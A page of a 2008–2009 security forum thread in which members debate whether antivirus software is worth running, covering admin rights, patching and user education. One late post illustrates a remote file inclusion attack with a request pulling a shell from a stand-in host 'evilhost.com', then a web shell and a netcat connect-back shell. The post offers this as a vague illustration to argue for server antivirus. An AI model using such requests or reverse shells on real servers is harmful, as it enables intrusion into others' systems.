• RSS
  • Twitter
  • FaceBook

Security Forums

Log in

FAQ | Search | Usergroups | Profile | Register | RSS | Posting Guidelines | Recent Posts

Anti-Virus - Is it really worth it?

Users browsing this topic:0 Security Fans, 0 Stealth Security Fans
Registered Security Fans: None
Goto page 1, 2  Next
Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Viruses // Worms

View previous topic :: View next topic  
Author Message
graycat
SF Mod
SF Mod


Joined: 29 Apr 2005
Posts: 16777195
Location: London, UK

Offline

PostPosted: Wed Dec 03, 2008 4:47 pm    Post subject: Anti-Virus - Is it really worth it? Reply with quote

As a long time Windows user my default position was always to put an anti-virus and software based firewall on my machine as a matter of course. Recently I've be re-evaluating this stance somewhat but not longer have a "personal" windows machine having moved to Macs. However, Apple's recent announcement that they are recommending users start using an AV product if only to make things more difficult for virus designers has made me think again on why to actually use an AV product.

Upon thinking about the whole AV application thing and ignoring OS differences (this will not be a "my OS rocks coz we don't get viruses, n00b" post! Smile ) I would think that if some basic security steps were implemented then you would be immune to the vast majority of virus attacks. Such things as never running as a priveledge account unless absolutely needed and certainly not surfing the web as an admin. Being aware of what you've got on your machine and what it does would also be a key step in my opinion. For example, you won't be susceptible to attacks aimed at v7 of adobe reader if you're running v9 or even something else for your pdf viewing.

So what do people think? should you have an AV solution installed? should only non-techies really need it and those that are "techie aware" should be fine without as long as they're awake?
Back to top
View user's profile Send private message Visit poster's website MSN Messenger
Fire Ant
Trusted SF Member
Trusted SF Member


Joined: 27 Jun 2008
Posts: 3
Location: London

Offline

PostPosted: Wed Dec 31, 2008 10:47 am    Post subject: Reply with quote

graycat,

Some interesting points. I certainly think that
Quote:
Being aware of what you've got on your machine and what it does would also be a key step in my opinion.
. This was easier in the days of DOS or even 3.1, today between Vista and crap manufacturers put on PC it is impossible to know whats going on in the background. Unfortunately, I think it is a catch 22 situation.

As a Mac user I have AV installed (corporate policy) but I have never had an alert to date. If I had a Windows PC I am sure that I would get plenty of of alerts mainly from websites. I this (promiscuous) age of inter-device communication AV is essential for everyone.

Matt_s
Back to top
View user's profile Send private message
susr
Just Arrived
Just Arrived


Joined: 15 Nov 2008
Posts: 0


Offline

PostPosted: Wed Dec 31, 2008 4:57 pm    Post subject: Reply with quote

matt_s wrote:
it is impossible to know whats going on


we can improve our understanding of systems, but it seems to be impossible to truly have a complete understanding of the intricacies of modern computers. we can perpetually keep abreast of current and commonly known issues, but what about the unpublished or non mainstream issues?

I believe graycat is right that basic security steps will protect you from the vast majority of attacks, but is being protected from the vast majority enough?
Back to top
View user's profile Send private message
larsmhansen
Trusted SF Member
Trusted SF Member


Joined: 11 Jan 2003
Posts: 0
Location: Boston, MA, USA

Offline

PostPosted: Thu Jan 01, 2009 12:53 am    Post subject: Reply with quote

Anti Virus software are like life insurance. When things are a-ok, it seems like a waste, but when the **** hits the fan, it's a good thing that you had it.

With a former employer, we had AV software on everything. PCs, servers, NetWare servers and Macs.
Back to top
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
alt.don
SF Boss
SF Boss


Joined: 04 Mar 2003
Posts: 16777079


Offline

PostPosted: Thu Jan 01, 2009 1:24 am    Post subject: Reply with quote

I would argue that an educated user does not need a/v software. That said, not every user is an educated one. Due to that lopsided statistic having a/v running at an enterprise level is still required.
Back to top
View user's profile Send private message Visit poster's website
Groovicus
Trusted SF Member
Trusted SF Member


Joined: 19 May 2004
Posts: 9
Location: Centerville, South Dakota

Offline

PostPosted: Thu Jan 01, 2009 3:47 am    Post subject: Reply with quote

Quote:
I would argue that an educated user does not need a/v software.


I have come to mostly agree with that. I don't have any sort of active scanning happening on any of my systems, except my email server. That even seems to be pretty much a waste anymore though because all of the suspicious email that I see tend to have links to infected websites. I have both of my browsers locked down, so nothing is allowed to run that I do not explicitly allow to run. I keep all of my software updated. The only time I use my AV is to scan downloaded files.

The problem lies in recognizing whether or not one is an educated user.
Back to top
View user's profile Send private message Visit poster's website
capi
SF Senior Mod
SF Senior Mod


Joined: 21 Sep 2003
Posts: 16777097
Location: Portugal

Offline

PostPosted: Thu Jan 01, 2009 9:35 pm    Post subject: Reply with quote

What alt.don and Groovicus said.

Although I would add that A/Vs in servers seem particularly like a waste of resources... or a sign that something's terribly wrong in the first place. A server shouldn't be downloading random crap or running weird programs to begin with.

I remember a quote by someone in this forum (don't remember exactly who it was right now, sorry) which fits perfectly into this situation. To paraphrase: an admin saying "thankfully the server was running an A/V" is akin to a school principal saying "thankfully the teacher was wearing a condom". Sure, that may be better than the alternative... but it kind of reveals a deeper (and much more worrying) problem, wouldn't you say?

It's like the whole GUI's on servers thing, the reasoning behind that has always eluded me... and I'm starting to think both issues may be related. You put a GUI on a server (i.e. you install Windows on it) and people start to treat it like their normal computer at home. They start to use it to do their computing, because it's right there, and you just needed IE to check out a quick site, or MSN or Solitaire or whatever. Then crap starts to happen.

Frankly, I blame the whole "dumb things down" mentality brought on by a certain well known OS manufacturer...

People insist on using pointy-clicky software on servers, fancy magical GUI configuration front-ends, graphical remote shells, Internet Explorer, My Computer and all that bloat, when the cold fact is a server isn't a workstation... Don't treat it as one. A server is a blade on a rack. You access it through a remote shell. If the network is down, you access it through a serial console. If the OS is down and you need to repair or reinstall it, then you hook up a monitor and a keyboard. Otherwise, all you need is a remote shell. No, not a fancy graphical shell that requires the server to run a window manager (GUI) that takes up more resources than the server software it was supposed to run. I'm talking about a remote command prompt. Yes, the scary command-line prompt, that's all you need. Really. If whichever server software you're running can't be configured from the command-line, then that server software is broken by design.

My Computer and pointy-clicky amenities are all fine and practical for your workstation, but a server has a single purpose and that's it. It has no place wasting resources running a window manager to begin with, let alone running untrusted programs, or anything other than what it was meant to run.
Back to top
View user's profile Send private message
AdamV
SF Mod
SF Mod


Joined: 06 Oct 2004
Posts: 24
Location: Leeds, UK

Offline

PostPosted: Fri Jan 02, 2009 1:04 pm    Post subject: Reply with quote

I use anti-virus software to keep the elephants away and so far it has proven very effective. I can't remember the last time I got attacked by an elephant.

Giving people too many privileges is usually the weak point. Local admin rights is a particular bug-bear of mine. UAC in Vista can help with this in some situations so that you can isolate the rights to the application that needs them, but in many cases the same apps which have been badly written and tested so they require local admin will not "play nicely" with UAC either.

I don't run AV on any of my work or personal systems (I have run a couple of products in the past, but the maintenance far outweighed the benefit in the end).
For my clients the advice is simple: limit your users' rights. If you absolutely have to give local admin rights to some users, do this properly (eg using the interactive account so they each only have those rights on the machines they are physically logged on to rather than all others across the LAN).
If any user has local admin rights, they probably need an AV system to give you some chance of an early warning, but this may not stop an infection (like having a burglar alarm but leaving your doors unlocked and windows open).
If people have local admin rights, expect some malware at some point and plan for it. Make sure you can restore systems and data rapidly to a known good point.
An effective spam filter product or service will remove most malware-laden email (even without a specific AV plugin). Ban webmail (hotmail etc) with an enforceable policy (with actual consequences from HR) backed up by technology (your firewall should actually prevent access to such sites).
Educate your users. With sticks if necessary.


The usual slippery slope goes something like:
"This third party application only works if all users run with administration rights. There is a better-written competing product which works without this but it would cost $3 per seat more than this kludged together, back-bedroom effort which the PHB bought after a long lunch with a sales rep"
"So we gave our users local admin rights. The easy way - we just put "Authenticated Users" in the local
admins group on all machines using Group Policy - huge time saving.

Then someone used their machine to access their personal hot/g/yahoo/foo-mail service (despite our policy outlawing this) and opened an attachment which turned out to be malware.
The user clicked seven "OK" messages to allow it to install, steal their address book and spread throughout our entire network. Of course they ignored every bit of training, memo, policy and email from the IT department they had ever been given.
They thought their machine was running a bit slow so they forwarded the email and attachment to everyone in their department, saying "my friend says this video is really funny but I can't view it as my machine is playing up - can you try to open it and let me know so I can watch it, thx".
One of them forwarded it to IT to ask for their help because they could not open it either. It could not read the message because by then the email server had fallen over with excess RPC traffic.
That's when we realised the policy we used to change the local admins group had been applied to all machines including our DCs, mail servers and corporate databases including the finance server, and everything was more riddled with infection than an overripe blue cheese. We had to roll back to the previous night's backups which took IT all weekend and lost a whole day's work and email in the process.
Our auditors said that this would not be good from a SOX perspective, so the IT support manager was sacked, even though he did not buy the product. The user kept their job because they argued that the system should have stopped them doing it if it was not allowed.

The PHB went on and bought an antivirus solution from the same sales rep. It requires local admin rights in order to install the daily updates, so we left our users as members of the local admin group. It cost a lot more than $3 per seat.
Because the AV product is really resource-hungry, some users can't work when they have big documents open, so we published a how-to document showing them how to temporarily disable the AV scanning. Of course, this only works because they have local admin rights...
Since installing it we have not had any virus infections. The PHB included this in his annual personal review as a "significant achievement in the last quarter". He got the pay rise he asked for.
He happily ignores fact that logs show that no potential infections have been stopped either - in other words the AV software is costing money, reducing productivity, providing no measurable benefit, giving even more inertia to the local admin issue so we may never get that fixed, and providing a false sense of security (any malware worth it's name will just disable the product before doing the real damage).

Compare to:
My boss asked me to evaluate a new application. It would not run without local admin rights, so he told the sales weasel to stick it where the sun don't shine and we paid a few thousand more for a better product from their competitor. Three years later it is still running fine, and they provide regular patches and feature updates which we deploy using Group Policy.
A user rang to say they had an error message on their screen when they tried to open an important document. Turned out to be one of those crappy bits of malware pretending to be an invoice, but it completely failed to install or do any harm as it relied on her having admin rights. Lazy script-kiddie losers.
Attended user's disciplinary hearing. Since it was in their corporate email they had not broken any major policies, just been a bit foolish in opening something unidentified without asking for advice first. HR recommended them to have a refresher by attending our security training session which we hold weekly to make sure we cover all new starters.
Went home early.
Back to top
View user's profile Send private message Visit poster's website
Burningmace
Just Arrived
Just Arrived


Joined: 09 Jan 2009
Posts: 0
Location: United Kingdom

Offline

PostPosted: Mon Jan 12, 2009 10:53 pm    Post subject: Reply with quote

I personally do not use AV software, as I would instantly notice if something was awry (I see my processes list about 30 times every day). I use Firefox 3 for browsing and have the AdBlock Plus extension installed. I also have the Web Developer Toolbar, which allows me to easily disable JavaScript and Java on the target page in case I need to access a page that I suspect may attempt to attack me. Windows Update runs every day too. If I do somehow manage to get malware on my machine, I remove it manually. I think a mixture of using a high quality open source browser, running Windows Update frequently and being smart when it comes to security will pretty much save any Windows installation from infection. If you've got Windows Firewall switched on and you're behind a NAT router it's even better, because malware really struggles to break through those barriers.

However I must mention that 95% of users out there don't use FF, they don't run Windows Update and they don't have a clue about security. In those cases, Anti-Virus software is a very good thing to have. The issue is that more than half of the users out there with AV software don't bother to update their definitions.

Another problem is that all the AV software out there is horrible. I've not found a single one that doesn't take over everything and bog the machine down in bureaucracy. Most of them have disgustingly friendly interfaces too - especially those bits of software that talk about themselves in the first person: "I've put the virus in quarantine for you. Have a nice day!". Ugh, drives me mad.
Back to top
View user's profile Send private message Visit poster's website
Fire Ant
Trusted SF Member
Trusted SF Member


Joined: 27 Jun 2008
Posts: 3
Location: London

Offline

PostPosted: Tue Jan 13, 2009 10:39 am    Post subject: Reply with quote

Burningmace,

I have to disagree to some of your points. If you can tell me what each of your 20+ processes, 70+ services and 100+ loaded drivers (this is XP!) do then I will give you a Mars bar. Looking at your processes list i now way protects you. Its like looking out your front window for a burglar, chances are the burglar is stealing something from your shed or taking your ''BOFH" mug from your kitchen whilst you sleep.

I fail to see how running FF and and Windows Update protect users. Remember that Windows RPC hack a few years ago, people were infected before the update was released by M$.

I did some work recently on breaking device control products and I learnt a lot, especially about Windows root kits. Not the crap stuff you get on Sony CDs but the Kernel layer stuff. You would have to have a crystal ball to tell if this stuff is running. Mind you AV software would never detect or be able to remove at this level. I do see this being the future.

Whilst I agree that AV is not bog systems and cause problems, what do you think the solution is for AV vendors?

As a security professional defense in depth is something thats hammered into you from mentors of past. At a corporate level anyone who says you dont need AV gets sacked. Can you, as a Windows user confirm that every download you make does not contain viral code? What checks do you make?

Matt_s
Back to top
View user's profile Send private message
Fire Ant
Trusted SF Member
Trusted SF Member


Joined: 27 Jun 2008
Posts: 3
Location: London

Offline

PostPosted: Tue Jan 13, 2009 11:16 am    Post subject: Reply with quote

I was thinking of a good analogy when I was in the shower. You buy a microwave meal, how do you know it wont make you ill?

You clean your cutlery, and work area. But what about the contents of the meal? You cook the meal to kill any bugs, this doesn't detract that you are very rarely aware of the provenance of your food. How do you know that someone isnt putting wood chippings in your sausage (thats what you get at Iceland anyway) or even worse?

There are a number of deeper issues, do you trust that small freeware vendor who has that tool you need? Are you sure that they haven't installed spyware in the software? Yes, they could write some custom viral code which the AV doesn't pick up.

Yes I agree that AV software has little use, I would rather cover my arse and not get caught out.

Matt_s
Back to top
View user's profile Send private message
PhiBer
SF Mod
SF Mod


Joined: 11 Mar 2003
Posts: 20
Location: Your MBR

Offline

PostPosted: Mon Jan 19, 2009 6:29 pm    Post subject: Reply with quote

Weirdly and interestingly enough, over the weekend I was browsing a legitimate website using FF with NoScript. Although NoScript blocked all of the scripts, Avast! popped up and stated "Trojan detected - IFRAME something." That made me think - why would Avast scan the site if NoScript would have blocked it (unless of course Avast sits at a lower level than NoScript)!? If people are not using NoScript type applications, I can see where AV could be useful in such exploits.
Back to top
View user's profile Send private message
alt.don
SF Boss
SF Boss


Joined: 04 Mar 2003
Posts: 16777079


Offline

PostPosted: Tue Jan 20, 2009 12:02 am    Post subject: Reply with quote

Not sure Phiber, though on another note, I often do all of my browsing using a linux image. Once I am done it is nuked. That said, most viruses apply to Windoze so I guess using Linux makes me a very small target.
Back to top
View user's profile Send private message Visit poster's website
susr
Just Arrived
Just Arrived


Joined: 15 Nov 2008
Posts: 0


Offline

PostPosted: Tue Jan 20, 2009 1:10 am    Post subject: Reply with quote

PhiBer wrote:
why would Avast scan the site if NoScript would have blocked it (unless of course Avast sits at a lower level than NoScript)


this happens because noscript only blocks the execution of scripts- it doesn't stop them from downloading into your temporary files/cache along with the rest of the site. (which is not any real danger by itself)
Back to top
View user's profile Send private message
babyface
Just Arrived
Just Arrived


Joined: 17 Jan 2009
Posts: 0
Location: Chicago

Offline

PostPosted: Wed Jan 21, 2009 2:41 am    Post subject: Reply with quote

This is back to the whole question of having AV...

Like others have said, if you're a mac or linux user (especially the last) you're pretty much safe. And nothing can beat safe surfing --- opening random emails, clicking on every link, and installing every video codec you're asked to is quite obviously stupid. If you're careful with the way you use the internet, you're pretty much fine.

That said, for those on 'doze, i don't see any reason why you wouldn't have AV. Sometimes, in spite of however savvy or safe you are, there's always a chance that something can go wrong (yeah that's pretty vague).

In general, there are several great free AV programs, that are unintrusive and effective. Just the fact that AV might slightly improve your defenses, i would say, is enough to put it on your computer. For example, a friend of mine uses AVG Free, which may not be great --- but at <60mb of memory usage & an auto-update feature, i'm sure it's better than having no AV.
Back to top
View user's profile Send private message
Kaosu
Just Arrived
Just Arrived


Joined: 03 Oct 2004
Posts: 0
Location: United States

Offline

PostPosted: Fri Jan 23, 2009 9:24 pm    Post subject: Reply with quote

A lot of good opinions have been shared in this thread, and I will admit that I only read the first handful of posts; but those posts did miss out on one very valid, and very real point: Modern anti-virus products can be useful on any system due to the simple fact that modern malicious software will often utilize remote exploits to compromise the machine, and then infect it. Without resident protection of an anti-virus then you will not get any type of protection, even if it is old malware utilizing a new exploit.

In the same sense, they can be somewhat helpful when the high-end malware authors utilize 0-day exploits to spread their malware across the Internet. Now, if malware is being spread with a 0-day the odds are there is no known signature in an AV database - true. However, the herustics of a modern AV could have possibly alerted you of the malicious behavior of said event. Without it, you would be completely oblivious.

I am not trying to argue that an AV will protect you from 0-day threats, but I am arguing that they could still prove to be helpful in these situations. You may be the smartest user alive, and keep everything up-to-date with browsers locked down, et cetera. But what happens when you're at the store and miss a critical update, or there is no patch available?

This is why most companies deploy AV products on a wide range of computers (Workstations, Servers, et cetera). Granted, something like Mamutu would be better to run on Windows-based servers since it has a smaller footprint than most AV products, and simply uses advanced herustics to alert you of potential threats.

AV products should also be used in situations where the server is hosting a web or mail server. Simply because RFI exploits are such a commonplace, and large PHP applications will generally be vulnerable to more than a handful of remote file inclusion exploits. Basically, when the attackers upload a known set of tools, web shell or bindshell then you will want to know about it before they can do anymore damage. An anti-virus would detect and delete most of these as they are uploaded. However, servers without anti-virus products will happily store them, and give the attackers enough time to not only compromise your web server, but also root your entire machine, and use trust escalation to attack other computers on the network, or even the router itself.

A perfect example to illustrate my point above is: Almost all anti-virus products will now detect netcat, and label it as a "hack tool". This can be annoying for us that actually use it (just exclude it in the AV), but now let us imagine that mood.php is vulnerable to an RFI attack. I now issue the command mood.php?=http://www.evilhost.com/shell.txt and using that I simply upload shell.php to a writable directory on your server. Now, I use my shell to upload netcat, and then I simply have netcat connect to me to bypass common firewall configurations. I now have an interactive shell that I can use to work on gaining administrative rights to your entire server. Now, if you had an AV running, it would have notified you, foiled my original attempts and you would have been able to figure out what I was doing. Since you didn't, I have since removed any relevant log entries and you think all is great - meanwhile you're now part of some botnet.

note: The above description is meant to be overly vague, and not contain any real technical information.

I believe that not every user needs an AV product to ensure the integrity of their system, but those users will also lose that small layer of defense that could have saved them from a situation like the ones listed above.
Back to top
View user's profile Send private message Send e-mail
Display posts from previous:   

Post new topic   Reply to topic   Printer-friendly version    Networking/Security Forums Index -> Viruses // Worms All times are GMT + 2 Hours
Goto page 1, 2  Next
Page 1 of 2


 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum

Community Area

Log in | Register